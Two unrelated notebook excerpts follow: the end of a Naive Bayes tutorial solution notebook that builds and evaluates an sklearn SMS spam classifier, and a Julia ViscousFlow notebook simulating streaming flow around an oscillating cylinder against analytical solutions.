# ** What does the term 'Naive' in 'Naive Bayes' mean ? **
#
# The term 'Naive' in Naive Bayes comes from the fact that the algorithm considers the features that it is using to make the predictions to be independent of each other, which may not always be the case. So in our Diabetes example, we are considering only one feature, that is the test result. Say we added another feature, 'exercise'. Let's say this feature has a binary value of `0` and `1`, where the former signifies that the individual exercises less than or equal to 2 days a week and the latter signifies that the individual exercises greater than or equal to 3 days a week. If we had to use both of these features, namely the test result and the value of the 'exercise' feature, to compute our final probabilities, Bayes' theorem would fail. Naive Bayes' is an extension of Bayes' theorem that assumes that all the features are independent of each other.
# ### Step 4.2: Naive Bayes implementation from scratch ###
#
#
# Now that you have understood the ins and outs of Bayes Theorem, we will extend it to consider cases where we have more than feature.
#
# Let's say that we have two political parties' candidates, '<NAME>' of the Green Party and '<NAME>' of the Libertarian Party and we have the probabilities of each of these candidates saying the words 'freedom', 'immigration' and 'environment' when they give a speech:
#
# * Probability that <NAME> says 'freedom': 0.1 ---------> `P(F|J)`
# * Probability that Jill Stein says 'immigration': 0.1 -----> `P(I|J)`
# * Probability that Jill Stein says 'environment': 0.8 -----> `P(E|J)`
#
#
# * Probability that <NAME> says 'freedom': 0.7 -------> `P(F|G)`
# * Probability that <NAME> says 'immigration': 0.2 ---> `P(I|G)`
# * Probability that Gary Johnson says 'environment': 0.1 ---> `P(E|G)`
#
#
# And let us also assume that the probablility of Jill Stein giving a speech, `P(J)` is `0.5` and the same for <NAME>, `P(G) = 0.5`.
#
#
# Given this, what if we had to find the probabilities of Jill Stein saying the words 'freedom' and 'immigration'? This is where the Naive Bayes'theorem comes into play as we are considering two features, 'freedom' and 'immigration'.
#
# Now we are at a place where we can define the formula for the Naive Bayes' theorem:
#
# <img src="images/naivebayes.png" height="342" width="342">
#
# Here, `y` is the class variable or in our case the name of the candidate and `x1` through `xn` are the feature vectors or in our case the individual words. The theorem makes the assumption that each of the feature vectors or words (`xi`) are independent of each other.
# To break this down, we have to compute the following posterior probabilities:
#
# * `P(J|F,I)`: Probability of Jill Stein saying the words Freedom and Immigration.
#
# Using the formula and our knowledge of Bayes' theorem, we can compute this as follows: `P(J|F,I)` = `(P(J) * P(F|J) * P(I|J)) / P(F,I)`. Here `P(F,I)` is the probability of the words 'freedom' and 'immigration' being said in a speech.
#
#
# * `P(G|F,I)`: Probability of <NAME> saying the words Freedom and Immigration.
#
# Using the formula, we can compute this as follows: `P(G|F,I)` = `(P(G) * P(F|G) * P(I|G)) / P(F,I)`
'''
Instructions: Compute the probability of the words 'freedom' and 'immigration' being said in a speech, or
P(F,I).
The first step is multiplying the probabilities of <NAME> giving a speech with her individual
probabilities of saying the words 'freedom' and 'immigration'. Store this in a variable called p_j_text
The second step is multiplying the probabilities of <NAME> giving a speech with his individual
probabilities of saying the words 'freedom' and 'immigration'. Store this in a variable called p_g_text
The third step is to add both of these probabilities and you will get P(F,I).
'''
# +
'''
Solution: Step 1
'''
# P(J)
p_j = 0.5
# P(F/J)
p_j_f = 0.1
# P(I/J)
p_j_i = 0.1
p_j_text = p_j * p_j_f * p_j_i
print(p_j_text)
# +
'''
Solution: Step 2
'''
# P(G)
p_g = 0.5
# P(F/G)
p_g_f = 0.7
# P(I/G)
p_g_i = 0.2
p_g_text = p_g * p_g_f * p_g_i
print(p_g_text)
# -
'''
Solution: Step 3: Compute P(F,I) and store in p_f_i
'''
p_f_i = p_j_text + p_g_text
print('Probability of words freedom and immigration being said are: ', format(p_f_i))
# Now we can compute the probability of `P(J|F,I)`, that is the probability of Jill Stein saying the words Freedom and Immigration and `P(G|F,I)`, that is the probability of <NAME> saying the words Freedom and Immigration.
'''
Instructions:
Compute P(J|F,I) using the formula P(J|F,I) = (P(J) * P(F|J) * P(I|J)) / P(F,I) and store it in a variable p_j_fi
'''
'''
Solution
'''
p_j_fi = p_j_text / p_f_i
print('The probability of Jill Stein saying the words Freedom and Immigration: ', format(p_j_fi))
'''
Instructions:
Compute P(G|F,I) using the formula P(G|F,I) = (P(G) * P(F|G) * P(I|G)) / P(F,I) and store it in a variable p_g_fi
'''
'''
Solution
'''
p_g_fi = p_g_text / p_f_i
print('The probability of <NAME> saying the words Freedom and Immigration: ', format(p_g_fi))
# And as we can see, just like in the Bayes' theorem case, the sum of our posteriors is equal to 1. Congratulations! You have implemented the Naive Bayes' theorem from scratch. Our analysis shows that there is only a 6.6% chance that <NAME> of the Green Party uses the words 'freedom' and 'immigration' in her speech as compard the the 93.3% chance for <NAME> of the Libertarian party.
# Another more generic example of Naive Bayes' in action is as when we search for the term 'Sacramento Kings' in a search engine. In order for us to get the results pertaining to the Scramento Kings NBA basketball team, the search engine needs to be able to associate the two words together and not treat them individually, in which case we would get results of images tagged with 'Sacramento' like pictures of city landscapes and images of 'Kings' which could be pictures of crowns or kings from history when what we are looking to get are images of the basketball team. This is a classic case of the search engine treating the words as independant entities and hence being 'naive' in its approach.
#
#
# Applying this to our problem of classifying messages as spam, the Naive Bayes algorithm *looks at each word individually and not as associated entities* with any kind of link between them. In the case of spam detectors, this usually works as there are certain red flag words which can almost guarantee its classification as spam, for example emails with words like 'viagra' are usually classified as spam.
# ### Step 5: Naive Bayes implementation using scikit-learn ###
#
# Thankfully, sklearn has several Naive Bayes implementations that we can use and so we do not have to do the math from scratch. We will be using sklearns `sklearn.naive_bayes` method to make predictions on our dataset.
#
# Specifically, we will be using the multinomial Naive Bayes implementation. This particular classifier is suitable for classification with discrete features (such as in our case, word counts for text classification). It takes in integer word counts as its input. On the other hand Gaussian Naive Bayes is better suited for continuous data as it assumes that the input data has a Gaussian(normal) distribution.
'''
Instructions:
We have loaded the training data into the variable 'training_data' and the testing data into the
variable 'testing_data'.
Import the MultinomialNB classifier and fit the training data into the classifier using fit(). Name your classifier
'naive_bayes'. You will be training the classifier using 'training_data' and y_train' from our split earlier.
'''
'''
Solution
'''
from sklearn.naive_bayes import MultinomialNB
naive_bayes = MultinomialNB()
naive_bayes.fit(training_data, y_train)
'''
Instructions:
Now that our algorithm has been trained using the training data set we can now make some predictions on the test data
stored in 'testing_data' using predict(). Save your predictions into the 'predictions' variable.
'''
'''
Solution
'''
predictions = naive_bayes.predict(testing_data)
# Now that predictions have been made on our test set, we need to check the accuracy of our predictions.
# ### Step 6: Evaluating our model ###
#
# Now that we have made predictions on our test set, our next goal is to evaluate how well our model is doing. There are various mechanisms for doing so, but first let's do quick recap of them.
#
# ** Accuracy ** measures how often the classifier makes the correct prediction. It’s the ratio of the number of correct predictions to the total number of predictions (the number of test data points).
#
# ** Precision ** tells us what proportion of messages we classified as spam, actually were spam.
# It is a ratio of true positives(words classified as spam, and which are actually spam) to all positives(all words classified as spam, irrespective of whether that was the correct classification), in other words it is the ratio of
#
# `[True Positives/(True Positives + False Positives)]`
#
# ** Recall(sensitivity)** tells us what proportion of messages that actually were spam were classified by us as spam.
# It is a ratio of true positives(words classified as spam, and which are actually spam) to all the words that were actually spam, in other words it is the ratio of
#
# `[True Positives/(True Positives + False Negatives)]`
#
# For classification problems that are skewed in their classification distributions like in our case, for example if we had a 100 text messages and only 2 were spam and the rest 98 weren't, accuracy by itself is not a very good metric. We could classify 90 messages as not spam(including the 2 that were spam but we classify them as not spam, hence they would be false negatives) and 10 as spam(all 10 false positives) and still get a reasonably good accuracy score. For such cases, precision and recall come in very handy. These two metrics can be combined to get the F1 score, which is weighted average of the precision and recall scores. This score can range from 0 to 1, with 1 being the best possible F1 score.
# We will be using all 4 metrics to make sure our model does well. For all 4 metrics whose values can range from 0 to 1, having a score as close to 1 as possible is a good indicator of how well our model is doing.
'''
Instructions:
Compute the accuracy, precision, recall and F1 scores of your model using your test data 'y_test' and the predictions
you made earlier stored in the 'predictions' variable.
'''
'''
Solution
'''
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
print('Accuracy score: ', format(accuracy_score(y_test, predictions)))
print('Precision score: ', format(precision_score(y_test, predictions)))
print('Recall score: ', format(recall_score(y_test, predictions)))
print('F1 score: ', format(f1_score(y_test, predictions)))
# ### Step 7: Conclusion ###
#
# One of the major advantages that Naive Bayes has over other classification algorithms is its ability to handle an extremely large number of features. In our case, each word is treated as a feature and there are thousands of different words. Also, it performs well even with the presence of irrelevant features and is relatively unaffected by them. The other major advantage it has is its relative simplicity. Naive Bayes' works well right out of the box and tuning it's parameters is rarely ever necessary, except usually in cases where the distribution of the data is known.
# It rarely ever overfits the data. Another important advantage is that its model training and prediction times are very fast for the amount of data it can handle. All in all, Naive Bayes' really is a gem of an algorithm!
#
# Congratulations! You have succesfully designed a model that can efficiently predict if an SMS message is spam or not!
#
# Thank you for learning with us!
|
DSND_Term1-master/lessons/Supervised/2_NaiveBayes/Bayesian_Inference_solution.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 1.1.0
# language: julia
# name: julia-1.1
# ---
# # Calculation of streaming flows in package `ViscousFlow`
using ViscousFlow
import ViscousFlow.Fields: curl
include("./Streaming.jl")
using Plots
pyplot()
clibrary(:colorbrewer)
default(grid = false)
using Statistics
# ### Solve for small-amplitude oscillation of a cylindrical body
# The motion of the body is described by oscillatory small-amplitude translation,
#
# $V_b(\xi,t) = \epsilon \hat{U}(t)$
#
# where $\epsilon \ll 1$, $\hat{U}(t)$ is a periodic velocity with unit amplitude, and $\xi \in S_b$ (i.e. it lies on the body surface). The associated position of any point on the surface of the body is then described by
#
# $X_b(\xi,t) = \xi + \epsilon \int_0^t \hat{U}(\tau)d\tau.$
#
# We will write the flow field in asympotic form, e.g. $v = \epsilon v_1 + \epsilon^2 v_2$, and seek to solve two asymptotic levels of equation (for vorticity)
#
# $\dfrac{\partial w_1}{\partial t} - \dfrac{1}{Re} \nabla^2 w_1 = 0$
#
# subject to boundary condition $v_1(\xi,t) = \hat{U}(t)$ for all $\xi \in S_b$. Note that the boundary condition is applied at the initial location of the surface, not its time-varying location.
#
# And at second order,
#
# $\dfrac{\partial w_2}{\partial t} - \dfrac{1}{Re} \nabla^2 w_2 = -\nabla\cdot(v_1 w_1),$
#
# subject to boundary condition $v_2(\xi,t) = -\int_0^t \hat{U}(\tau)d\tau \cdot \nabla v_1(\xi,t)$ for all $\xi \in S_b$. This is also applied at the initial location of the surface.
#
# Thus, to solve this problem, we will set up a state vector that contains $w_1$, $w_2$, and an unscaled 'body' state $x_c$, $y_c$. These latter components will be used to hold the components of $\Delta\hat{X} \equiv \int_0^t \hat{U}(\tau)d\tau$.
#
# A fluid particle, initially at a location $x$, is subjected to a slightly different velocity, $U(x,t)$, over the ensuing oscillation period, since it is advected by the local velocity to sample nearby points. Its first-order velocity is simply $U_1(x,t) = v_1(x,t)$. Its second order velocity, however, is
#
# $U_2(x,t) = v_2(x,t) + \int_0^t v_1(x,\tau)d\tau \cdot \nabla v_1(x,t)$
#
# In particular, if the particle is initially on the surface, $x \in S_b$, then $v_1 = \hat{U}$, and the second term of this expression above cancels $v_2$, so that $U_2 = 0$. This ensures that the particle continues to oscillate with the body's surface velocity. Let us define an Eulerian displacement field,
#
# $\Delta X(x,t) = \int_0^t v(x,\tau)d\tau, \quad \Delta X(x,0) = 0,$
#
# or, equivalently,
#
# $\dfrac{d\Delta X}{dt} = v(x,t), \quad \Delta X(x,0) = 0.$
#
# Then, expanding $\Delta X$ in an asymptotic sequence, $\Delta X = \epsilon \Delta X_1 + \epsilon^2 \Delta X_2$, we have
#
# $U_2(x,t) = v_2(x,t) + \Delta X_1(x,t) \cdot \nabla v_1(x,t)$
#
# Let us define a drift displacement, $\Delta X_d$, by the solution of
#
# $\dfrac{d\Delta X_d}{dt} = \Delta X_1(x,t) \cdot \nabla v_1(x,t), \quad \Delta X_d(x,0) = 0$
#
# The motion of a fluid particle, starting at $x$, is thus given by
#
# $X_p(x,t) = x + \epsilon \Delta X_1(x,t) + \epsilon^2 (\Delta X_2(x,t) + \Delta X_d(x,t))$
#
# These represent the integral curves of the velocity field. If we look only at these integral curves over one period, then we seek the net displacement made by a particle over this period,
#
# $X_p(x,T) - x = \Delta X(x,T) + \epsilon^2 \Delta X_d(x,T) = \int_0^T U(x,\tau)d\tau \equiv T \overline{U}(x).$
#
# We only need a mean velocity field for this purpose.
# #### Set the oscillation parameters
Re = 40.0
ϵ = 0.1
Ω = 1.0 # angular frequency
Ax = 1.0 # x amplitude (before scaling by ϵ)
ϕx = 0.0 # phase lead of x motion
Ay = 0.0 # y amplitude
ϕy = 0.0 # phase lead of y motion
oscil = RigidBodyMotions.RigidBodyMotion(RigidBodyMotions.Oscillation(Ω,Ax,ϕx,Ay,ϕy))
# #### Let's plot it just to check
# Keep in mind that this is the 'unscaled' form of the motion; the actual motion would be multiplied by $\epsilon$.
t = range(0.0,stop=4π,length=401)
u = map(ti -> real(oscil(ti)[2]),t) # u component of velocity of centroid
plot(t,u)
# ### Generate the analytical solution
p = Params(0.1,Re)
# First-order solution
# +
K = 1
Ψ₁ = ComplexFunc(r -> -p.C/r + 2Y(r)/p.γ)
W₁ = D²(Ψ₁,K) # note that this is actually the negative of the vorticity. We will account for this when we evaluate it.
Ur₁, Uθ₁ = curl(Ψ₁,K)
# for verifying the solution
LW₁ = D²(W₁,K);
resid1 = ComplexFunc(r -> LW₁(r)+im*p.Re*W₁(r))
println("Maximum residual on solution = ",maximum(abs.(resid1.(range(1,5,length=10)))))
# for verifying boundary conditions
dΨ₁ = ComplexFunc(r -> derivative(Ψ₁,r))
bcresid1 = Ψ₁(1) - 1
bcresid2 = dΨ₁(1) - 1
println("BC residual on Ψ₁(1) = ",abs(bcresid1))
println("BC residual on dΨ₁(1) = ",abs(bcresid2))
# -
function ω₁ex(x,y,t)
r = sqrt(x^2+y^2)
return real(-W₁(r)*y/r*exp.(-im*t))
end
function u₁ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
return real.((Ur₁(r)*coseval^2-Uθ₁(r)*sineval^2)*exp.(-im*t))
end
function v₁ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
return real.((Ur₁(r)+Uθ₁(r))*coseval*sineval*exp.(-im*t))
end
function ψ₁ex(x,y,t)
r = sqrt(x^2+y^2)
return real(Ψ₁(r)*y/r*exp.(-im*t))
end
# Analytical solution of the steady part
# +
K = 2
fakefact = 1
#f₀ = ComplexFunc(r -> -0.5*p.γ²*p.Re*(0.5*(p.C*conj(X(r))-conj(p.C)*X(r))/r^2 + X(r)*conj(Z(r)) - conj(X(r))*Z(r)))
f₀ = ComplexFunc(r -> -p.γ²*p.Re*(0.5*p.C*conj(X(r))/r^2 + X(r)*conj(Z(r))))
f̃₀ = ComplexFunc(r -> f₀(r) - 0.5*p.γ²*p.Re*(-0.5*conj(Z(r))+0.5*Z(r)))
I⁻¹ = ComplexIntegral(r->f₀(r)/r,1,Inf,length=100000)
I¹ = ComplexIntegral(r->f₀(r)*r,1,Inf,length=100000)
I³ = ComplexIntegral(r->f₀(r)*r^3,1,20,length=400000)
I⁵ = ComplexIntegral(r->f₀(r)*r^5,1,20,length=400000)
Ψs₂ = ComplexFunc(r -> -r^4/48*I⁻¹(r) + r^2/16*I¹(r) + I³(r)/16 + I⁻¹(1)/16 - I¹(1)/8 - fakefact*0.25im*p.γ*Y(1) +
1/r^2*(-I⁵(r)/48-I⁻¹(1)/24+I¹(1)/16 + fakefact*0.25im*p.γ*Y(1)))
Ws₂ = D²(Ψs₂,K)
Usr₂, Usθ₂ = curl(Ψs₂,K)
# for verifying the solution
LWs₂ = D²(Ws₂,K)
resids = ComplexFunc(r -> real(LWs₂(r)-f₀(r)))
println("Maximum residual on solution = ",maximum(abs.(resids.(range(1,5,length=10)))))
# for verifying boundary conditions
dΨs₂ = ComplexFunc(r -> derivative(Ψs₂,r))
bcresids1 = Ψs₂(1)
bcresids2 = real(dΨs₂(1) - 0.25im*W₁(1))
println("BC residual on Ψs₂(1) = ",abs(bcresids1))
println("BC residual on dΨs₂(1) = ",abs(bcresids2))
# -
# Analytical solution of unsteady part
# +
K = 2
fakefact = 1
g₀ = ComplexFunc(r -> 0.5*p.γ²*p.Re*p.C*X(r)/r^2)
g̃₀ = ComplexFunc(r -> g₀(r) - 0.5*p.γ²*p.Re*Z(r))
Kλ = ComplexFunc(r -> H11(1)*H22(r) - H12(1)*H21(r))
IKgr = ComplexIntegral(r -> r*Kλ(r)*g₀(r),1,20,length=400000)
IH21gr = ComplexIntegral(r -> r*H21(r)*g₀(r),1,Inf,length=100000)
Igr⁻¹ = ComplexIntegral(r -> g₀(r)/r,1,Inf,length=100000)
Igr³ = ComplexIntegral(r -> g₀(r)*r^3,1,20,length=400000)
Ig¹ = ComplexFunc(r -> 0.25im*π/(p.λ²*H11(1))*IKgr(r)*H21(r))
Ig² = ComplexFunc(r -> 0.25im*π/(p.λ²*H11(1))*IH21gr(r)*Kλ(r))
Ig³ = ComplexFunc(r -> 1/(p.λ²*p.λ*H11(1))*((H21(r)-H21(1)/r^2)*Igr⁻¹(1)+IH21gr(1)/r^2))
Ig⁴ = ComplexFunc(r -> -0.25/p.λ²*(Igr⁻¹(r)*r^2-Igr⁻¹(1)/r^2+Igr³(r)/r^2))
Ψ₂ = ComplexFunc(r -> Ig¹(r) + Ig²(r) + Ig³(r) + Ig⁴(r) + fakefact*0.5im/sqrt(2)*Y(1)/H11(1)*(H21(r)-H21(1)/r^2))
Ψ̃₂ = ComplexFunc(r -> Ψ₂(r)+ 0.5im*(-p.C/r^2 + Z(r))) # cylinder-fixed reference frame... not used
W₂ = D²(Ψ₂,K)
Ur₂, Uθ₂ = curl(Ψ₂,K);
# for verifying the solution
LW₂ = D²(W₂,K);
resid = ComplexFunc(r -> LW₂(r)+2im*p.Re*W₂(r)-g₀(r))
println("Maximum residual on solution = ",maximum(abs.(resid.(range(1,5,length=10)))))
# for verifying boundary conditions
dΨ₂ = ComplexFunc(r -> derivative(Ψ₂,r))
bcresid1 = Ψ₂(1)
bcresid2 = dΨ₂(1) - 0.5im*p.γ*Y(1)
println("BC residual on Ψ₂(1) = ",abs(bcresid1))
println("BC residual on dΨ₂(1) = ",abs(bcresid2))
# -
function ω₂ex(x,y,t)
r = sqrt(x^2+y^2)
sin2eval = 2*x*y/r^2
return real(-Ws₂(r) .- W₂(r)*exp.(-2im*t))*sin2eval
end
function u₂ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
cos2eval = coseval^2-sineval^2
sin2eval = 2*coseval*sineval
ur = real.(Usr₂(r) .+ Ur₂(r)*exp.(-2im*t))*cos2eval
uθ = real.(Usθ₂(r) .+ Uθ₂(r)*exp.(-2im*t))*sin2eval
return ur*coseval .- uθ*sineval
end
function v₂ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
cos2eval = coseval^2-sineval^2
sin2eval = 2*coseval*sineval
ur = real.(Usr₂(r) .+ Ur₂(r)*exp.(-2im*t))*cos2eval
uθ = real.(Usθ₂(r) .+ Uθ₂(r)*exp.(-2im*t))*sin2eval
return ur*sineval .+ uθ*coseval
end
function ψ₂ex(x,y,t)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
sin2eval = 2*coseval*sineval
return real(Ψs₂(r) .+ Ψ₂(r)*exp.(-2im*t))*sin2eval
end
function ψ̄₂ex(x,y)
r = sqrt(x^2+y^2)
coseval = x/r
sineval = y/r
sin2eval = 2*coseval*sineval
return real(Ψs₂(r))*sin2eval
end
# #### Set up points on the body:
n = 150;
body = Ellipse(1.0,n)
# Transform the body with a specified initial position and orientation.
cent = (0.0,0.0)
α = 0.0
T = RigidTransform(cent,α)
T(body) # transform the body to the current configuration
# Now set up the coordinate data for operator construction
coords = VectorData(body.x,body.y);
# #### Set up the domain
xlim = (-4.0,4.0)
ylim = (-4.0,4.0)
plot(body,xlim=xlim,ylim=ylim)
# Set the cell size and time step size
Δx = 0.0202
Δt = min(π*0.5*Δx,π*0.5*Δx^2*Re)
# ### Now set up the system
# The discretized equations include the constraint forces on the surface, used to enforce the boundary conditions. The first level can be written as
#
# $\dfrac{dw_1}{dt} - \dfrac{1}{Re}Lw_1 + C^T E^T f_1 = 0,\quad -E C L^{-1}w_1 = \hat{U}, \quad w_1(0) = 0$
#
# where $E$ is the interpolation operator, $E^T$ is the regularization operator, $C^T$ is the rot (curl) operator, and $f_1$ represents the vector of discrete surface forces.
#
# The second asymptotic level is written as
#
# $\dfrac{dw_2}{dt} - \dfrac{1}{Re}Lw_2 + C^T E^T f_2 = -N(w_1),\quad -E C L^{-1}w_2 = \Delta\hat{X}\cdot E G C L^{-1}w_1, \quad w_2(0) = 0$
#
# where $N$ represents the non-linear convective term. We must also advance the state $\Delta\hat{X}$:
#
# $\dfrac{d\Delta\hat{X}}{dt} = \hat{U}, \quad \Delta\hat{X}(0) = 0$
#
# To account for the fluid particle motion, we will also integrate the Eulerian displacement fields $\Delta X_1$ and $\Delta X_2$:
#
# $\dfrac{d\Delta X_1}{dt} = v_1, \quad \Delta X_1(x,0) = 0$
#
# and
#
# $\dfrac{d\Delta X_2}{dt} = v_2, \quad \Delta X_2(x,0) = 0$
#
# The construction of the NavierStokes system creates and stores the regularization and interpolation matrices. These will not change with time, since the boundary conditions are applied at the initial location of the surface points.
#
#
ddftype = Fields.Goza
sys = NavierStokes(Re,Δx,xlim,ylim,Δt, X̃ = coords, isstore = true, isasymptotic = true, isfilter = false, ddftype = ddftype)
# Set up the state vector and constraint force vector for a static body
w₀ = Nodes(Fields.Dual,size(sys))
ΔX = Edges(Primal,w₀)
f1 = VectorData(coords);
xg, yg = coordinates(w₀,sys.grid)
# Make the tuple data structures. The state tuple holds the first and second asymptotic level vorticity, the Eulerian displacement field for each level, and the two components of the unscaled centroid displacement of the body. The last three parts have no constraints, so we set the force to empty vectors.
u = (zero(w₀),zero(w₀),zero(ΔX),zero(ΔX),[0.0,0.0])
f = (zero(f1),zero(f1),Vector{Float64}(),Vector{Float64}(),Vector{Float64}())
TU = typeof(u)
TF = typeof(f)
# #### Define operators that act upon the tuples and the right-hand sides of the equations and constraints.
# The right-hand side of the first-order equation is 0. The right-hand side of the second-order equation is the negative of the non-linear convective term, based on the first-order solution; for this, we use the predefined `r₁`. The right-hand side of the Eulerian displacement field equations are just the corresponding velocities at those levels. The right-hand side of the body update equation is the unscaled velocity.
function TimeMarching.r₁(u::TU,t::Float64)
_,ċ,_,_,α̇,_ = oscil(t)
return zero(u[1]), TimeMarching.r₁(u[1],t,sys), lmul!(-1,curl(sys.L\u[1])), lmul!(-1,curl(sys.L\u[2])), [real(ċ),imag(ċ)]
end
# The right-hand side of the first constraint equation is the unscaled rigid-body velocity, evaluated at the surface points. The right-hand side of the second constraint equation is $-\hat{X}\cdot\nabla v_1$. The Eulerian displacement and the body update equations have no constraint, so these are set to an empty vector.
gradopx = Regularize(sys.X̃,cellsize(sys);I0=origin(sys),issymmetric=true,ddftype=ddftype,graddir=1)
gradopy = Regularize(sys.X̃,cellsize(sys);I0=origin(sys),issymmetric=true,ddftype=ddftype,graddir=2)
dEx = InterpolationMatrix(gradopx,sys.Fq,sys.Vb)
dEy = InterpolationMatrix(gradopy,sys.Fq,sys.Vb)
nothing
# +
function TimeMarching.r₂(u::TU,t::Float64)
fact = 2 # not sure how to explain this factor yet.
_,ċ,_,_,α̇,_ = oscil(t)
U = (real(ċ),imag(ċ))
# -ΔX̂⋅∇v₁
Δx⁻¹ = 1/cellsize(sys)
sys.Fq .= curl(sys.L\u[1]) # -v₁
sys.Vb .= dEx*sys.Fq # dv₁/dx*Δx
sys.Vb.u .*= -fact*Δx⁻¹*u[5][1]
sys.Vb.v .*= -fact*Δx⁻¹*u[5][1]
Vb = deepcopy(sys.Vb) # -X⋅dv₁/dx
sys.Vb .= dEy*sys.Fq # dv₁/dy*Δx
sys.Vb.u .*= -fact*Δx⁻¹*u[5][2]
sys.Vb.v .*= -fact*Δx⁻¹*u[5][2]
Vb .+= sys.Vb # -X⋅dv₁/dx - Y.⋅dv₁/dy
return U + α̇ × (sys.X̃ - body.cent), Vb, Vector{Float64}(), Vector{Float64}(), Vector{Float64}()
end
# -
# The integrating factor for the first two equations is simply the one associated with the usual viscous term. The last three equations have no term that needs an integrating factor, so we set their integrating factor operators to the identity, I.
using LinearAlgebra
plans = ((t,u) -> Fields.plan_intfact(t,u,sys),(t,u) -> Fields.plan_intfact(t,u,sys),(t,u) -> Identity(),(t,u) -> Identity(),(t,u)-> I)
# The constraint operators for the first two equations are the usual ones for a stationary body and are precomputed. There are no constraints or constraint forces for the last three equations.
function TimeMarching.plan_constraints(u::TU,t::Float64)
B₁ᵀ, B₂ = TimeMarching.plan_constraints(u[1],t,sys) # These are used by both the first and second equations
return (B₁ᵀ,B₁ᵀ,f->zero(u[3]),f->zero(u[4]),f->zero(u[5])), (B₂,B₂,u->Vector{Float64}(),u->Vector{Float64}(),u->Vector{Float64}())
end
# Set up the integrator here
@time ifherk = IFHERK(u,f,sys.Δt,plans,TimeMarching.plan_constraints,
(TimeMarching.r₁,TimeMarching.r₂),rk=TimeMarching.RK31,isstored=true)
# ### Advance the system!
# Initialize the state vector and the history vectors
# +
t = 0.0
u = (zero(w₀),zero(w₀),zero(ΔX),zero(ΔX),[0.0,0.0])
thist = Float64[];
w1hist = [];
w2hist = [];
dX1hist = [];
dX2hist = [];
X̂hist = [];
tsample = Δt; # rate at which to store field data
# -
# Set the time range to integrate over.
tf = 8π
T = Δt:Δt:tf;
@time for ti in T
global t, u, f = ifherk(t,u)
push!(thist,t)
if (isapprox(mod(t,tsample),0,atol=1e-6) || isapprox(mod(t,tsample),tsample,atol=1e-6))
push!(w1hist,deepcopy(u[1]))
push!(w2hist,deepcopy(u[2]))
push!(dX1hist,deepcopy(u[3]))
push!(dX2hist,deepcopy(u[4]))
push!(X̂hist,deepcopy(u[5]))
end
end
println("solution completed through time t = ",t)
# #### Some functions to compute physical quantities
function vorticity(w::Nodes{Fields.Dual},sys)
ω = deepcopy(w)
return rmul!(ω,1/cellsize(sys))
end
function velocity(w::Nodes{Fields.Dual},sys)
return rmul!(curl(sys.L\w),-1)
end
function streamfunction(w::Nodes{Fields.Dual},sys)
return rmul!(sys.L\w,-cellsize(sys))
end
function nl(w::Nodes{Fields.Dual},sys)
return rmul!(TimeMarching.r₁(w,0.0,sys),1/cellsize(sys))
end
# #### Compute an average over the previous period
function average(hist::Vector{Any},itr)
avg = zero(hist[1])
return avg .= mapreduce(x -> x/length(itr),+,hist[itr]);
end
# #### Plotting first order solution
iplot = length(w1hist) # index of time step for plotting
ω₁ = vorticity(w1hist[iplot],sys)
q₁ = velocity(w1hist[iplot],sys)
ψ₁ = streamfunction(w1hist[iplot],sys)
nothing
xg,yg = coordinates(w₀,sys.grid)
plot(xg,yg,ω₁,levels=range(-10,10,length=30),color=:RdBu)
plot!(body)
plot(xg,yg,ψ₁,levels=range(-1,1,length=31),color=:RdBu)
plot!(body,fill=:false)
ix = 201
plot(yg,ω₁[ix,:],ylim=(-10,10),xlim=(1,4),label="DNS",xlabel="y")
plot!(yg,map(y -> ω₁ex(xg[ix],y,thist[iplot]),abs.(yg)),label="Analytical")
#plot!(yg,-real(W₁.(abs.(yg))*exp(-im*thist[iplot])))
# #### History of DNS results at an observation point
# Not yet using interpolation, so we specify the indices of the observation point rather than x,y coordinates
# The following functions pick off the vorticity and velocity histories at an index pair. Note that u and v components that share the same indices are at different physical locations, and each are at different locations from vorticity.
function vorticity_history(sample_index::Tuple{Int,Int},whist,sys)
i, j = sample_index
return map(x -> vorticity(x,sys)[i,j],whist)
end
function velocity_history(sample_index::Tuple{Int,Int},whist,sys)
i, j = sample_index
tmp = reshape(collect(Iterators.flatten(
map(x -> (q = velocity(x,sys); [q.u[i,j], q.v[i,j]]),whist))),
2,length(whist))
return tmp[1,:], tmp[2,:]
end
# This computes the history of the rhs of the second-order equation at the sample point
function nl_history(sample_index::Tuple{Int,Int},whist,sys)
i, j = sample_index
return map(w1 -> TimeMarching.r₁(w1,0.0,sys)[i,j]/cellsize(sys),whist)
end
function centroid_history(Xhist)
tmp = reshape(collect(Iterators.flatten(Xhist)),2,length(Xhist))
return tmp[1,:], tmp[2,:]
end
sampij = (201,135) # indices of sample point
ω₁hist = vorticity_history(sampij,w1hist,sys);
# Get coordinates of sample point on dual node grid
xg, yg = coordinates(w₀,sys.grid)
xeval = xg[sampij[1]]
yeval = yg[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
coseval = xeval/reval
sineval = yeval/reval
reval
plot(thist,ω₁hist,label="DNS",ylim=(-10,10))
plot!(thist,ω₁ex(xeval,yeval,thist),label="Analytical") # note that we correct the sign of W₁ here
#plot!(thist,real.(-W₁(reval)*sineval*exp.(-im*thist)),label="Analytical") # note that we correct the sign of W₁ here
u₁hist, v₁hist = velocity_history(sampij,w1hist,sys);
# Get the coordinates of the sample point in the u-component edges for plotting this component
xuedge, yuedge, xvedge, yvedge = coordinates(Edges(Primal,w₀),sys.grid)
xeval = xuedge[sampij[1]]
yeval = yuedge[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
coseval = xeval/reval
sineval = yeval/reval
plot(thist,u₁hist,ylim=(-2,2),label="DNS")
plot!(thist,u₁ex(xeval,yeval,thist),xlim=(0,8π),label="Analytical")
# Plot the centroid history
xhist, yhist = centroid_history(X̂hist)
plot(thist,xhist,label="X̂c")
plot!(thist,yhist,label="Ŷc")
# #### The second-order equation
iplot = length(w2hist)
ω₂ = vorticity(w2hist[iplot],sys)
q₂ = velocity(w2hist[iplot],sys)
ψ₂ = streamfunction(w2hist[iplot],sys)
nothing
xg,yg = coordinates(w₀,sys.grid)
